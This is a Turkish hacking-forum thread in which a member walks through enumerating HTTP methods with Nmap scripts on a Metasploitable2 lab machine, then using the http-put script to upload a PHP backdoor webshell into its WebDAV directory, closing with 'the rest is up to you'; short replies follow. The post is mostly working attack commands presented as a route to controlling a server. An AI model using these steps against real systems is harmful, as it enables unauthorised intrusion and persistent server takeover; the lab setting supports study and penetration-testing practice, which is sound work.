Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.




Nmap Scripts Http Methods (WebDAV-Http-Put) / The Hacker

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 4 Hafta önce   #1
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893


Nmap Scripts Http Methods (WebDAV-Http-Put) / The Hacker



Herkese Merhaba Bu Konuda Nmap Http Method Script'leri İle Hedef Servise Yönelik Pentest İşlemi Gerçekleştireceğiz. Konu İçeriğini Anlatmak Gerekir İse İlk Olarak Hedef Sistemde WEBDAV Protokolünde Put Metodu Açık Olup Olmadığını Öğrenip Ardından Açık İse Bunu Kendi Lehimize Kullanarak Hedef Sistemde Dosya Atma ve Silme vb. İşlemleri Gerçekleştiriyor Olabileceğimizden Shell Upload Ederek Sistemi Kontrol Edeceğiz. Http İstek Metodları Hakkındaki Bilgiyi Şu Konudan Alabilirsiniz ;

https://medium.com/@gokhan.746/http-...s-8f43d4d9c4c6

Benim hedef sistemim "Métasploitable2" olacak.



Nmap Http Methods Scritp'ini kullanarak hedef sistemde kullanmamıza izin verilen metotlara bakalım.


Kod:
nmap --scripts=http-methods -p 80 192.168.1.10


Sadece 4 metot kullanımına izin veriliyor tabiki daha detaylı bakmak gerek bunun için yeni bir script deneyelim tam kullanabileceğimiz metotlara bakabilmek için. Öncelikle yolu göstermek için "Métasploitable2" zafiyetli makinesinin webdav servisindeki "header" bilgisini görmem gerekiyordu.




Öğrendiğimize göre script'i çalıştırmaya ve metot kontrolüne devam edebilirim.




Kod:
nmap -sV --scripts http-methods  --script-args http-methods.url-path="/dav" ,http-methods.test-all 192.168.1.10 -p 80
Desteklenen Metotları Görüyoruz Bu Sayede Sistemde Dosya Ekleme-Silme-Değiştirme-Güncelleme Gibi İşleri Kolaylıkla Yapabiliriz. Şimdi İse "Put" Metodu Açık Olan Sunucuda Dosya Ekleme Silme İşlemini Test Edeceğiz. Yine Bir Nmap Script'i Kullanacağız Artı Olarak Sisteme Webshell Upload Edeceğiz. Zaten sistemde mevcut olan "php-bacdoor.php" kullanacağım ben




Kod:
cd /usr/share/webshells/php
ls
Shell yolunu öğrendiğinize göre upload işlemini gerçekleştirebiliriz. İlk defa duyulacak belki ama Parrot Os hata verdiğinden Kali'de devam edeceğim işleme.




Kod:
nmap -p 80 192.168.1.10 --script http-put --script-args  http-put.url='/dav/tht.php',http-put.file='/usr/share/webshells/php/php-backdoor.php'
Yazarak sisteme shell'imizi upload ediyoruz, tht.php yazan yere istediğiniz ismi verebilirsiniz "blabla.php" olacak şekilde.









Gerekli Yetkileri Almış Olduk Geri Kalan İşlem Size Kaldı Nasıl Kullanmak İsterseniz Kullanabilirsiniz.





Konu THE HACKER 21 tarafından ( 4 Hafta önce Saat 17:13 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

"Tranquila, p0inne Teşekkür etti.
Alt 4 Hafta önce   #2
  • Bilgi Teknolojileri Ekibi
  • Üye Bilgileri
Üyelik tarihi
08/2017
Nereden
Trabzon
Yaş
1
Mesajlar
Konular

Teşekkür (Etti): 690
Teşekkür (Aldı): 288




Hangi açıkları bu yönde kullanabiliriz



___________________________________________

-Ernoylmz

  • <Kalbimizde>Solidstar</Kalbimizde>
==>Telegram<==
Cam gibi olacaksın, Kırdılarmı Keseceksin.

Konu 'PALA tarafından ( 4 Hafta önce Saat 17:34 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 4 Hafta önce   #3
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893




Alıntı:
"Tranquila´isimli üyeden Alıntı Mesajı göster
Hangi Açıkları Bu Yönde Kullanabiliriz
Konuda da Belirttiğim Gibi Put Metodu Açık İse Kullanabilirsin.

Konu THE HACKER 21 tarafından ( 4 Hafta önce Saat 17:53 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

"Tranquila Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau